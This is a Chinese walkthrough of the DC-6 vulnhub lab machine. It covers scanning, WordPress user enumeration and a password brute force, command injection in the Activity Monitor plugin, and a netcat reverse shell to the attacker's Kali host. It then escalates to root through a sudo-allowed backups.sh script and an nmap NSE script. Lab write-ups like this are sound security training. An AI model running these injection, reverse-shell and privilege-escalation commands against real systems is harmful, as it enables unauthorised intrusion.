块块0.o
块块0.o

DC-6靶场

DC-6靶场下载:

https://www.five86.com/downloads/DC-6.zip

下载后解压会有一个DC-3.ova文件,直接在vm虚拟机点击左上角打开-->文件-->选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式,即可开始渗透

首先进行主机发现:

arp-scan -l                                                       

发现靶机ip为192.168.183.149

Interface: eth0, type: EN10MB, MAC: 00:0c:29:a0:2b:e1, IPv4: 192.168.183.138

WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied

WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied

Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.183.1   00:50:56:c0:00:08       (Unknown)

192.168.183.2   00:50:56:fc:0d:25       (Unknown)

192.168.183.149 00:0c:29:a5:b4:82       (Unknown)

192.168.183.254 00:50:56:fe:ac:e6       (Unknown)

Nmap扫描一下靶机ip:

nmap -sV -p-  192.168.183.149  

-sV 代表扫描主要的服务信息

-p- 参数p是指定端口,后面的-代表所有端口。

得到报告:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-19 16:10 CST

Nmap scan report for 192.168.183.149

Host is up (0.00072s latency).

Not shown: 65533 closed tcp ports (reset)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

80/tcp open  http    Apache httpd 2.4.25 ((Debian))

MAC Address: 00:0C:29:A5:B4:82 (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

尝试打开网站,但是发现打不开192.168.183.149,会重定向去http://wordy/,这里就跟DC-2靶场一样需要修改host文件了,在物理机访问网页的话只需修改物理机上的就好

Windows的host文件位置:

C:\Windows\System32\drivers\etc\host

在最下面添加一行
192.168.183.149(靶机ip) wordy

再次访问就发现能够成功访问网页

DC-6靶场_第1张图片

Dirsearch扫描目录:

dirsearch  -u 192.168.183.149 -e * -i 200

Output File: /home/kali/reports/_192.168.183.149/_23-12-19_16-16-43.txt

Target: http://192.168.183.149/

[16:16:43] Starting:                                                   

[16:17:04] 200 -   18KB - /index.php

[16:17:06] 200 -    7KB - /license.txt

[16:17:13] 200 -    3KB - /readme.html

[16:17:23] 200 -    0B  - /wp-content/

[16:17:23] 200 -    0B  - /wp-config.php

[16:17:23] 200 -  517B  - /wp-admin/install.php

[16:17:23] 200 -    0B  - /wp-cron.php

[16:17:23] 200 -    4KB - /wp-includes/

[16:17:23] 200 -    1KB - /wp-login.php

发现/wp-login.php有个登录界面,但是这里burpsuite爆破密码爆破了很久都没有动静

Whatweb指纹识别:

whatweb  -v 192.168.183.149  

得到一个总结

HTTP Headers:

        HTTP/1.1 301 Moved Permanently

        Date: Tue, 19 Dec 2023 08:27:17 GMT

        Server: Apache/2.4.25 (Debian)

        X-Redirect-By: WordPress

        Location: http://wordy/

        Content-Length: 0

        Connection: close

        Content-Type: text/html; charset=UTF-8

WhatWeb report for http://wordy/

Status    : 200 OK

Title     : Wordy – Just another WordPress site

IP        : 192.168.183.149

Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], UncommonHeaders[link], WordPress[5.1.1]  

看到Wordpress可以用wpscan扫描器可以实现获取Wordpress站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

wpscan常用参数

–update 更新到最新版本
–url | -u 要扫描的WordPress站点.
–force | -f 不检查网站运行的是不是WordPress
–enumerate | -e [option(s)] 枚举

wpscan扫描

1、扫描WordPress漏洞、版本、ip等信息

wpscan --url http://www.xxxxx.top/

2、扫描枚举wordpress用户

wpscan --url http://www.xxxxx.top/ --enumerate u

3、扫描主题

wpscan --url http://www.xxxxx.top/ --enumerate t

4、扫描插件漏洞

wpscan --urlhttp://www.xxxxx.top/ --enumerate p

5、使用WPScan进行暴力破解在进行暴力破解攻击之前,我们需要创建对应的字典文件。输入下列命令:

wpscan --url https://www.xxxxx.top/-e u --wordlist /root/桌面/password.txt

6、暴力破解用户密码

wpscan --url dc-2 user.txt -P passwd.txt

7、wpscan --ignore-main-redirect --url 192.168.1.8 --enumerate u --force

这里用:

wpscan --url http://wordy/ --enumerate u

得到五个用户名,存进usr.txt里

在网页的提示中,作者告诉我们用字典来破解的话需要五年的时间,估计我的电脑支撑不了那么久!把kali自带字典 rockyou.txt中包含k01的密码导出来生成 一本字典的话会节省很多时间。

cat /usr/share/wordlists/rockyou.txt|grep k01 > passwords.txt

cat 表示读取并输出到终端。

| 表示用“|”前面输出的数据给“|”后面命令做处理。

grep 表示用正则表达式匹配数据

> 表示将输出数据写入“>”后面文件。

这一句就是读取rockyou.txt的数据给grep来匹配,匹配到包含k01的数据就写入passwords.txt中。

不过我在这里遇到了一个小问题,找不到rockyou.txt,顺着路径追下去发现我/usr/share/wordlists下的是rockyou.txt.gz而不是.txt,这种情况解压就行了,在文件里解压会提示没有权限,所以去到命令行用root权限在该路径下解压

现在用户名文件和密码字典文件都有了,可以开始暴力破解了。

wpscan --url wordy -U user.txt -P passwords.txt

得到了一组藏狐密码:

账户:mark  

密码:helpdesk01

网页登录mark用户,

DC-6靶场_第2张图片

我们发现一个有漏洞的插件Activity monitor,其4.7.11版本存在rce

DC-6靶场_第3张图片

在tool的位置抓包ip,点击lookup

DC-6靶场_第4张图片

利用管道符执行ls /返回了根目录

DC-6靶场_第5张图片

把ls /换成反弹shell:

nc 192.168.183.138 666 -e /bin/bash

kali打开监听:

nc -lvvp 666

然后回来发包,kali监听成功,进入交互式shell:

python -c "import pty;pty.spawn('/bin/bash')"

浏览home文件:
在/home/mark/stuff目录下发现things-to-do.txt文件,

cat /home/mark/stuff/things-to-do.txt

其中有一组用户和密码:

用户名:graham
密码:GSo7isUM1D4

换个账户远程登录graham试试

ssh [email protected]

跳转到graham用户后,再尝试一次有没有suid提权或其他一些敏感文件。执行命令:

sudo -l

返回报告

Matching Defaults entries for graham on dc-6:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:

    (jens) NOPASSWD: /home/jens/backups.sh

我们发现graham可以用jens的身份执行 /home/jens/backups.sh,我们尝试把 /bin/bash追加到这个文件,

cd /home/jens

echo '/bin/bash' >> backups.sh

然后用jens的身份执行这个文件,

sudo -u jens ./backups.sh

此时会打开一个具有jens权限的shell。

nmap提权

这次切换到了jens用户,我们再次查看一下可不可以使用suid提权,执行 sudo -l查看一下有没有可以提权的命令。

sudo -l

Matching Defaults entries for jens on dc-6:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:

    (root) NOPASSWD: /usr/bin/nmap

可以用root权限执行nmap,nmap在早期版本是可以用来提权的,我们尝试利用nmap提权。将提权代码 os.execute("/bin/sh")写入一个文件中。

echo 'os.execute("/bin/sh")' > shell.nse

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=shell.nse

现在就已经提权成功了,可以读取最后的flag,不过有个问题好像看不见打出来的东西,但是命令确实能执行,回车就行

cd /root

cat theflag.txt

成功得到flag!

jens@dc-6:~$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
jens@dc-6:~$ echo 'os.execute("/bin/sh")'>shell.nse
jens@dc-6:~$ sudo nmap --script=shell.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2023-12-19 21:17 AEST
# # /bin/sh: 2:cd: not found
root@dc-6:/home/jens# backups.sh  backups.tar.gz  shell.nse
root@dc-6:/home/jens# root@dc-6:~# total 4
-rw-r--r-- 1 root root 541 Apr 26  2019 theflag.txt
root@dc-6:~# theflag.txt

虽然看不到自己打的命令,但是命令的输出会出现在后面,正常回车就行

你可能感兴趣的:(vulnhub靶机合集,提权,DC靶场系列,网络安全,安全,web安全,DC-6靶场,vulnhub)

  • Python 自动化脚本系列:介绍 codeory Pythonpython自动化
    在大数据和数字化转型的时代,自动化已成为成功的关键组成部分。Python自动化提供了许多好处,可以彻底改变我们工作和解决问题的方式。以下是Python自动化如此重要的一些关键原因:时间节约:使用Python自动化处理重复和耗时的任务可以让个人和组织节省大量时间。通过让Python脚本处理单调乏味的任务,专业人士可以专注于需要人类创造力和决策的高价值活动。提高效率:Python自动化简化工作流程,消
  • intel cpu芯片的命名规则 巭犇 Linuxlinux
    IntelCPU的命名规则可以帮助用户理解处理器的性能、代数、市场定位等信息。以下是IntelCPU命名的一些常见规则,主要以消费级和服务器级处理器为例。1.消费级处理器(如IntelCore系列)命名结构通常,IntelCore系列处理器的名称结构如下:品牌系列+产品线+代数+SKU编号+后缀(可选)例如:IntelCorei7-12700K解释品牌系列:IntelCoreIntel的主流消费级
  • C++系列-const所有用法总结 weixin_48668114 c++开发语言
    const用法总结const修饰变量const修饰普通变量const修饰指针变量常量指针指针常量常量指针常量const修饰引用const修饰函数形参参数是普通的值传递参数类型是引用const修饰函数返回值值传递方式返回指针方式返回常量引用方式返回const修饰成员函数const修饰在函数名后面常对象春日-朱熹胜日寻芳泗水滨,无边光景一时新。等闲识得东风面,万紫千红总是春。const是constan
  • 【redis】主从的高可用 HardCorePlayer redis
    Redis副本是如何保证高可用的在redis副本的基础上,redis提供了简单易用的主从模式。从节点会精确的从主节点复制数据,并且在连接中断的时候自动重连,无论主节点发生什么都会尝试复制数据。实现机制主要如下3种:当主从节点连接良好时,如果主节点数据集发生改变(包括客户端写入,key过期或删除,或其他影响数据集的操作),主节点会向从节点发送一系列命令来保证从节点更新数据。当主从之间的连接断开时,不
  • [leetcode刷题]力扣刷题4之整数转罗马数字(中等) 孙小二写代码 leetcode算法贪心算法哈希表
    这题要比罗马数字转整数难,题目输入整数,输出罗马数字。示例:输入:num=3749输出:"MMMDCCXLIX"思路贪心法则:我们每次尽量使用最大的数来表示。比如对于1994这个数,如果我们每次尽量用最大的数来表示,依次选1000,900,90,4,会得到正确结果MCMXCIV。所以,我们将哈希表按照从大到小的顺序排列,然后遍历哈希表,直到表示完整个输入。.-力扣(LeetCode).-备战技术面
  • 安卓全盘加密 (Full-Disk Encryption, FDE) 概述 achirandliu android安卓全盘加密Full-DiskFDE
    标签:Full-DiskEncryption;FDE;安卓全盘加密(Full-DiskEncryption,FDE)概述1.什么是全盘加密(FDE)?全盘加密(Full-DiskEncryption,FDE)是在Android操作系统中用于保护用户数据的一种安全机制。FDE加密了设备的整个数据分区,这意味着一旦设备被加密,存储在设备上的所有用户数据(包括应用数据、文件、媒体内容等)都会以加密形式存
  • 2022-2023学年英语周报九年级第10期答案及试题(初三第十期) gaokaos
    阅读理解:CastleRock,Colorado,isintheFrontRange进入查看:2022-2023学年英语周报九年级第10期答案及试题(初三第十期)CastleRock,Colorado,isintheFrontRangebetweenDenverandColoradoSprings.Thetownwasfirstsettledinthe1870sandnamedfortherock
  • 【MySQL数据库管理问答题】第7章 MySQL 安全 summer.335 MySQLMySQL数据库管理问答题数据库mysql安全
    目录1.哪些常见的措施可以用来防范网络安全风险?2.请对安全套接字层(SSL)和传输层安全性(TLS)协议加以简要得说明。3.请对ca.pem、server-cert.pem、server-key.pem、ca-key.pem、client-cert.pem、client-key.pem这些与SSL有关的文件,分别给出功能说明。4.MySQL8.0企业防火墙都有哪些特点和功能?1.哪些常见的措施可
  • 公交地铁遇到孕妇,我们该不该让座? 小彩12
    前两天,频频收到推送,重庆怀孕9个月的女子肖某于6月17日凌晨,独自一人从家中离开,失踪50余天。后在浙江找到,发现其并未怀孕。对于这个闹剧,不知其家人怎么想,不过,就像男主人所说的,人安全就好。今天想说的是跟孕妇有关的,这件事其实只是个引子。地铁和公交是人们经常坐的通勤交通工具,我身边现在有好几个孕妇,都曾表示过,在地铁里很少遇到让座的。包括我自己,在怀孕的时候,碰到让座的真的是会让我开心许久。
  • springboot集成kafka @SendTo对于转发单条消息和转发批量消息的两种情况 ddq呀 springbootkafka后端
    //当转发单条消息时,可以采用如下方式@KafkaListener(groupId="a-group",topics="a-topic")@SendTo("b-topic")publicStringconsumeA(ConsumerRecordconsumerRecord){returnconsumerRecord.value();}@KafkaListener(groupId="b-group"
  • 7个温馨提示,让你的网络更安全 等保星视界
    编辑:小星多一份网络防护技能多一份信息安全保障互联网的世界让我们可以随时随地与世界各地的人们自由的交流,人们利用连接的网络进行各种形式的网上活动。而因为网络的方便与快捷,所以其发展速度也是非常快的。但是一样事物如果在短时间内发展的过于迅速,随之而来的问题也会非常的多,网络也是如此。网络的连接性虽然是惊人的,但每个互联网连接的个人都有属于他们自己的网络和数据,所以任何一个用户都有可能成为网络攻击的受
  • API接口的安全性分类及其对开发的影响 2401_86932795 职场发展职场和发展求职招聘单一职责原则
    API接口的分类:按照访问权限分公开APIs:对所有用户开放的API。私有APIs:只对特定用户或组织开放的API。内部API:仅供组织内部使用的API,用于连接组织内部的不同系统或服务。第三方APIs:由第三方开发并提供的API。API接口的分类:按照安全分非安全API:这些API可能不提供或仅提供有限的安全措施。安全API:这些API设计有安全措施,如HTTPS、OAuth认证、访问控制列表(
  • monster-summon 爱你的虎口我脱离了危险
    Richandfungameplay,alotofcontentisnotfun!ThegameisbasedoninstantgameplayandchallengestheultimateBOSS!
  • IT统一运维平台案例 javaDocker 运维
    IT统一运维平台案例统一运维平台的架构图,划分为三个主要部分:统一运维门户、报告与决策中心、运维服务调度中心。以下是对每个部分的解析:1.统一运维门户这是用户的统一入口,提供了一系列运维相关的服务和功能,包括:综合信息发布:发布运维相关的信息,如公告、通知等。自助服务台:用户可以通过自助服务台提交请求或解决常见问题。运维工作台:提供运维人员日常工作的工具和界面。服务仪表盘:用于监控关键服务的运行状
  • 标准库STM32F1_USART2_DMA接收发送数据源码分享直接复制能用 谢谢~谢先生 1024程序员节stm32笔记
    标准库STM32F1_USART2_DMA接收发送数据源码分享直接复制能用STM32的DMA通道表:现有一个小需求,使用STM32F1系列单片机做串口2的收发数据的功能,通过PC上的串口调试助手给单片机发一串数据,单片机收到数据后再给PC的串口调试助手发回去。本次使用的是串口DMA方式接收数据,和DMA方式发送数据。STM32使用USART2,对应单片机的PA1控制方向,PA2发送,PA3接收。代
  • 我在高职教STM32——ADC电压采集与光敏电阻(3) 南耿先生 我在高职教STM32stm32嵌入式硬件单片机
    大家好,我是老耿,高职青椒一枚,一直从事单片机、嵌入式、物联网等课程的教学。对于高职的学生层次,同行应该都懂的,老师在课堂上教学几乎是没什么成就感的。正是如此,才有了借助CSDN平台寻求认同感和成就感的想法。在这里,我准备陆续把自己花了很多心思设计的教学课件分享出来,如果您正是一名单片机爱好者或是一名同行,欢迎点赞+关注,各位的支持是本人持续输出的动力,多谢多谢!从我们已经学到的知识可以了解到,单
  • PMP®实战思维之二——宏观环境分析(下) 82c4d7af3f78
    PMP®实战思维之二——宏观环境分析(下)写在前面的话:作为一套完整且不断自我升级的项目管理知识体系,PMP®确实做到了普遍良好做法的知识集成与知识迁移,而如何从实战领域应用PMP®项目管理知识而使组织获得竞争力的提升,是每一位PM都在研讨的问题,PMP®实战思维系列文章是我机构结合PMP®知识体系和长久以来自身积累的企业管理咨询经验形成的一些有效观点,分享给各位读者,希望能够抛砖引玉、共同研讨。
  • 《风暴舞》开播,娜扎造型加分,演技有进步,陈伟霆颜值演技在线,剧情略显不足! 不治而娱
    本文为原创,喜欢请关注哟由陈伟霆、古力娜扎领衔主演,宋妍霏、董岩磊、秦鸣悦主演,任达华、蒋雯丽、巫刚、王姬特别出演的都市谍战剧《风暴舞》开播。该剧讲述了李俊杰受雇于一家信息安全公司,在一系列的任务中,他发现这家公司内部与境外邪恶势力之间有千丝万缕的关联,在行动组高级组长周子萱的帮助下,二人合力调查,揭露内幕的故事。陈伟霆与娜扎的合作是大部分人承认的高颜值组合,两人在剧中的造型都很有特点,另外该剧播
  • 【PythonCode】力扣Leetcode1~5题Python版 小斌哥ge PythonCode/Python面试题leetcodepython算法力扣Python力扣
    【PythonCode】力扣Leetcode1~5题Python版前言力扣Leetcode是一个集学习、刷题、竞赛等功能于一体的编程学习平台,很多计算机相关专业的学生、编程自学者、IT从业者在上面学习和刷题。在Leetcode上刷题,可以选择各种主流的编程语言,如C++、JAVA、Python、Go等。还可以在线编程,实时执行代码,如果代码通过了平台准备的测试用例,就可以通过题目。本系列中的文章从
  • 【好书分享第十期】大模型应用解决方案_基于ChatGPT和GPT-4等Transformer架构的自然语言处理(文末送书) 屿小夏 书籍推荐chatgpttransformer架构大模型AI
    文章目录前言一、内容简介二、作者简介三、目录四、摘录粉丝福利前言在不到4年的时间里,Transformer模型以其强大的性能和创新的思想,迅速在NLP社区崭露头角,打破了过去30年的记录。BERT、T5和GPT等模型现在已成为计算机视觉、语音识别、翻译、蛋白质测序、编码等各个领域中新应用的基础构件。因此,斯坦福大学最近提出了“基础模型”这个术语,用于定义基于巨型预训练Transformer的一系列
  • SGSH: Stimulate Large Language Models with Skeleton Heuristics for Knowledge Base Question UnknownBody LLMDailyKnowledgeGraph语言模型人工智能自然语言处理
    本文是LLM系列文章,针对《SGSH:StimulateLargeLanguageModelswithSkeletonHeuristicsforKnowledgeBaseQuestionGeneration》的翻译。SGSH:用骨架启发式方法模拟大型语言模型以生成知识库问题摘要1引言2Pilot研究3方法4实验5相关工作6结论摘要知识库问题生成(KBQG)旨在从知识库中提取的一组三元组事实中生成自
  • 《明日家族》:如果你想放空90分钟,这部电影大概能让你长舒一口气 冷帅
    这是一部非常轻松的电影,如果这个时候的你刚好也什么都不想做,只想放空自己的话,推荐你看一下这部电影。下面是我整理出来的简单的介绍。卡司这部电影一共有4个角色,父亲、母亲、女儿、女婿。这四个角色的扮演者每一个人的履历是光鲜无比的。父亲:松重丰,绝对算是大器晚成的演员了,之前一直是黄金配角,直到《孤独的美食家》系列推出,他才在日本演艺圈里大放异彩,目前这个系列已经做到第八部了,依然人气不减,如果老爷子
  • 必看系列 | 娱乐社交、游戏行业的你不能错过的一次机会! 游戏智眼 城市沙龙人工智能游戏游戏策划游戏程序娱乐华为云
    随着5G、AI、区块链等前沿技术的深度融合应用,泛娱乐行业正经历深刻变革的同时,也面临着一系列挑战与问题,面对社交产品监管的加强、海外市场的双重机遇与风险以及增速放缓的游戏行业......探求新增长点与新思路成为当下泛娱乐行业从业者的关切!在此背景下,网易数智联合华为云,诚挚邀请您参加“泛娱乐行业城市沙龙杭州站”。我们期待在杭州与您相见,共探在合规前提下,如何挖掘产品的新增长点,打造爆款产品,并实
  • k8s必知必会 小卒曹阿瞒 八股文分布式网络bigdata
    目录1、简述etcd及其特点etcd是CoreOS团队发起的开源项目,是一个管理配置信息和服务发现(servicediscovery)的项目,它的目标是构建一个高可用的分布式键值(key-value)数据库,基于Go语言实现。特点:简单:支持REST风格的HTTP+JSONAPI安全:支持HTTPS方式的访问快速:支持并发1k/s的写操作可靠:支持分布式结构,基于Raft的一致性算法,Raft是一
  • 购买阿里云服务器需要多少钱?活动价2000元左右的阿里云服务器分享 阿里云最新优惠和活动汇总
    购买阿里云服务器需要多少钱,如果你计划购买一台价格在2000元左右的阿里云服务器,目前活动价格在2000元左右的阿里云服务器大概有16台,月付最低只要1814.00元可购买一台通用算力型u1实例8核32G配置的云服务器1个月,年付则可买到2核2G、2核4G和2核8G配置,如果购买其他系列的云服务器,最长可以买到计算型c8y实例1核2G配置云服务器3年,最低价格只要2147.76元。下面是2023年
  • pythonyield详解_Python yield详解 碍事的尾巴 pythonyield详解
    importrandomdefyield_test(n):foriinrange(n):yieldcall(i)print("i=",i)#做一些其它的事情print("dosomething.")print("end.")defcall(i):returni*2defyield_randint(count):i=0whilei
  • 每天一个数据分析题(五百零二)- 分割式聚类算法 跟着紫枫学姐学CDA 数据分析题库算法数据分析聚类
    以下哪个选项是分割式聚类算法?A.K-Means。B.CentroidMethodC.Ward’sMethodD.以上皆非数据分析认证考试介绍:点击进入题目来源于CDA模拟题库点击此处获取答案数据分析专项练习题库内容涵盖Python,SQL,统计学,数据分析理论,深度学习,可视化,机器学习,Spark八个方向的专项练习题库,数据分析从业者刷题必备神器!
  • 雪垠中学举行"预防溺水 守护生命"防溺水专题教育活动启动仪式 黑土有营养
    天气逐渐转热,青少年儿童的溺水伤亡事故也进入了高发期。对处于南水北调中线渠首流域的九龙学子来说,防溺水教育显得尤其重重。为有效预防溺水事故的发生,强化全体师生预防溺水的安全责任意识,构建平安校园,5月21日上午,雪垠中学联合九龙派出所、南水北调中线邓州管理处、邓州市蓝天救援队,举行了主题为“预防溺水守护生命”的防溺水安全教育启动仪式。活动伊始,九龙中心校郑先强校长致词并对各位专家领导的到来表示欢迎
  • 【YOLO系列】YOLO介绍 有品位的小丑 目标检测与生成式模型学习记录YOLO目标跟踪人工智能
    目录前言一、算法特点二、工作原理前言YOLO,全称为"YouOnlyLookOnce",是一种流行的实时目标检测算法,由JosephRedmon等人于2015年首次提出。YOLO的核心思想是将目标检测任务视为一个单一的回归问题,直接从图像像素到边界框坐标和类别概率的映射。这种设计使得YOLO能够以非常快的速度进行目标检测,同时保持较高的精度,特别适合需要实时处理的应用场景。一、算法特点速度快YOL
  • YOLO系列目标检测数据集大全_yolo数据集(1) 2401_84187537 程序员YOLO目标检测人工智能
    Darknet版YOLOv4猫狗识别训练好的权重文件:https://download.csdn.net/download/zhiqingAI/85541214Darknet版YOLOv3猫狗识别训练好的权重文件:https://download.csdn.net/download/zhiqingAI/85541209DeepSORT-YOLOv5猫狗检测和跟踪+可视化目标运动轨迹yolov7猫狗
  • 枚举的构造函数中抛出异常会怎样 bylijinnan javaenum单例
    首先从使用enum实现单例说起。 为什么要用enum来实现单例? 这篇文章( http://javarevisited.blogspot.sg/2012/07/why-enum-singleton-are-better-in-java.html)阐述了三个理由: 1.enum单例简单、容易,只需几行代码: public enum Singleton { INSTANCE;
  • CMake 教程 aigo C++
    转自:http://xiang.lf.blog.163.com/blog/static/127733322201481114456136/   CMake是一个跨平台的程序构建工具,比如起自己编写Makefile方便很多。 介绍:http://baike.baidu.com/view/1126160.htm 本文件不介绍CMake的基本语法,下面是篇不错的入门教程: http:
  • cvc-complex-type.2.3: Element 'beans' cannot have character Cb123456 springWebgis
      cvc-complex-type.2.3: Element 'beans' cannot have character     Line 33 in XML document from ServletContext resource [/WEB-INF/backend-servlet.xml] is i
  • jquery实例:随页面滚动条滚动而自动加载内容 120153216 jquery
    <script language="javascript"> $(function (){ var i = 4;$(window).bind("scroll", function (event){ //滚动条到网页头部的 高度,兼容ie,ff,chrome var top = document.documentElement.s
  • 将数据库中的数据转换成dbs文件 何必如此 sqldbs
    旗正规则引擎通过数据库配置器(DataBuilder)来管理数据库,无论是Oracle,还是其他主流的数据都支持,操作方式是一样的。旗正规则引擎的数据库配置器是用于编辑数据库结构信息以及管理数据库表数据,并且可以执行SQL 语句,主要功能如下。 1)数据库生成表结构信息:         主要生成数据库配置文件(.conf文
  • 在IBATIS中配置SQL语句的IN方式 357029540 ibatis
    在使用IBATIS进行SQL语句配置查询时,我们一定会遇到通过IN查询的地方,在使用IN查询时我们可以有两种方式进行配置参数:String和List。具体使用方式如下: 1.String:定义一个String的参数userIds,把这个参数传入IBATIS的sql配置文件,sql语句就可以这样写: <select id="getForms" param
  • Spring3 MVC 笔记(一) 7454103 springmvcbeanRESTJSF
             自从 MVC 这个概念提出来之后 struts1.X  struts2.X   jsf 。。。。。 这个view 层的技术一个接一个! 都用过!不敢说哪个绝对的强悍! 要看业务,和整体的设计!      最近公司要求开发个新系统!
  • Timer与Spring Quartz 定时执行程序 darkranger springbean工作quartz
    有时候需要定时触发某一项任务。其实在jdk1.3,java sdk就通过java.util.Timer提供相应的功能。一个简单的例子说明如何使用,很简单: 1、第一步,我们需要建立一项任务,我们的任务需要继承java.util.TimerTask package com.test; import java.text.SimpleDateFormat; import java.util.Date;
  • 大端小端转换,le32_to_cpu 和cpu_to_le32 aijuans C语言相关
    大端小端转换,le32_to_cpu 和cpu_to_le32  字节序 http://oss.org.cn/kernel-book/ldd3/ch11s04.html         小心不要假设字节序. PC 存储多字节值是低字节为先(小端为先, 因此是小端), 一些高级的平台以另一种方式(大端)
  • Nginx负载均衡配置实例详解 avords
    [导读] 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。负载均衡先来简单了解一下什么是负载均衡,单从字面上的意思来理解就可以解 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。 负载均衡 先来简单了解一下什么是负载均衡
  • 乱说的 houxinyou 框架敏捷开发软件测试
    从很久以前,大家就研究框架,开发方法,软件工程,好多!反正我是搞不明白! 这两天看好多人研究敏捷模型,瀑布模型!也没太搞明白. 不过感觉和程序开发语言差不多, 瀑布就是顺序,敏捷就是循环. 瀑布就是需求、分析、设计、编码、测试一步一步走下来。而敏捷就是按摸块或者说迭代做个循环,第个循环中也一样是需求、分析、设计、编码、测试一步一步走下来。 也可以把软件开发理
  • 欣赏的价值——一个小故事 bijian1013 有效辅导欣赏欣赏的价值
      第一次参加家长会,幼儿园的老师说:"您的儿子有多动症,在板凳上连三分钟都坐不了,你最好带他去医院看一看。"  回家的路上,儿子问她老师都说了些什么,她鼻子一酸,差点流下泪来。因为全班30位小朋友,惟有他表现最差;惟有对他,老师表现出不屑,然而她还在告诉她的儿子:"老师表扬你了,说宝宝原来在板凳上坐不了一分钟,现在能坐三分钟。其他妈妈都非常羡慕妈妈,因为全班只有宝宝
  • 包冲突问题的解决方法 bingyingao eclipsemavenexclusions包冲突
    包冲突是开发过程中很常见的问题: 其表现有: 1.明明在eclipse中能够索引到某个类,运行时却报出找不到类。 2.明明在eclipse中能够索引到某个类的方法,运行时却报出找不到方法。 3.类及方法都有,以正确编译成了.class文件,在本机跑的好好的,发到测试或者正式环境就 抛如下异常: java.lang.NoClassDefFoundError: Could not in
  • 【Spark七十五】Spark Streaming整合Flume-NG三之接入log4j bit1129 Stream
    先来一段废话: 实际工作中,业务系统的日志基本上是使用Log4j写入到日志文件中的,问题的关键之处在于业务日志的格式混乱,这给对日志文件中的日志进行统计分析带来了极大的困难,或者说,基本上无法进行分析,每个人写日志的习惯不同,导致日志行的格式五花八门,最后只能通过grep来查找特定的关键词缩小范围,但是在集群环境下,每个机器去grep一遍,分析一遍,这个效率如何可想之二,大好光阴都浪费在这上面了
  • sudoku solver in Haskell bookjovi sudokuhaskell
    这几天没太多的事做,想着用函数式语言来写点实用的程序,像fib和prime之类的就不想提了(就一行代码的事),写什么程序呢?在网上闲逛时发现sudoku游戏,sudoku十几年前就知道了,学生生涯时也想过用C/Java来实现个智能求解,但到最后往往没写成,主要是用C/Java写的话会很麻烦。   现在写程序,本人总是有一种思维惯性,总是想把程序写的更紧凑,更精致,代码行数最少,所以现
  • java apache ftpClient bro_feng java
    最近使用apache的ftpclient插件实现ftp下载,遇见几个问题,做如下总结。 1. 上传阻塞,一连串的上传,其中一个就阻塞了,或是用storeFile上传时返回false。查了点资料,说是FTP有主动模式和被动模式。将传出模式修改为被动模式ftp.enterLocalPassiveMode();然后就好了。 看了网上相关介绍,对主动模式和被动模式区别还是比较的模糊,不太了解被动模
  • 读《研磨设计模式》-代码笔记-工厂方法模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 工厂方法模式:使一个类的实例化延迟到子类 * 某次,我在工作不知不觉中就用到了工厂方法模式(称为模板方法模式更恰当。2012-10-29): * 有很多不同的产品,它
  • 面试记录语 chenyu19891124 招聘
    或许真的在一个平台上成长成什么样,都必须靠自己去努力。有了好的平台让自己展示,就该好好努力。今天是自己单独一次去面试别人,感觉有点小紧张,说话有点打结。在面试完后写面试情况表,下笔真的好难,尤其是要对面试人的情况说明真的好难。 今天面试的是自己同事的同事,现在的这个同事要离职了,介绍了我现在这位同事以前的同事来面试。今天这位求职者面试的是配置管理,期初看了简历觉得应该很适合做配置管理,但是今天面
  • Fire Workflow 1.0正式版终于发布了 comsci 工作workflowGoogle
    Fire Workflow 是国内另外一款开源工作流,作者是著名的非也同志,哈哈.... 官方网站是 http://www.fireflow.org 经过大家努力,Fire Workflow 1.0正式版终于发布了 正式版主要变化: 1、增加IWorkItem.jumpToEx(...)方法,取消了当前环节和目标环节必须在同一条执行线的限制,使得自由流更加自由 2、增加IT
  • Python向脚本传参 daizj python脚本传参
    如果想对python脚本传参数,python中对应的argc, argv(c语言的命令行参数)是什么呢? 需要模块:sys 参数个数:len(sys.argv) 脚本名:    sys.argv[0] 参数1:     sys.argv[1] 参数2:     sys.argv[
  • 管理用户分组的命令gpasswd dongwei_6688 passwd
    NAME: gpasswd - administer the /etc/group file SYNOPSIS: gpasswd group gpasswd -a user group gpasswd -d user group gpasswd -R group gpasswd -r group gpasswd [-A user,...] [-M user,...] g
  • 郝斌老师数据结构课程笔记 dcj3sjt126com 数据结构与算法
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  • yii2 cgridview加上选择框进行操作 dcj3sjt126com GridView
    页面代码 <?=Html::beginForm(['controller/bulk'],'post');?> <?=Html::dropDownList('action','',[''=>'Mark selected as: ','c'=>'Confirmed','nc'=>'No Confirmed'],['class'=>'dropdown',])
  • linux mysql fypop linux
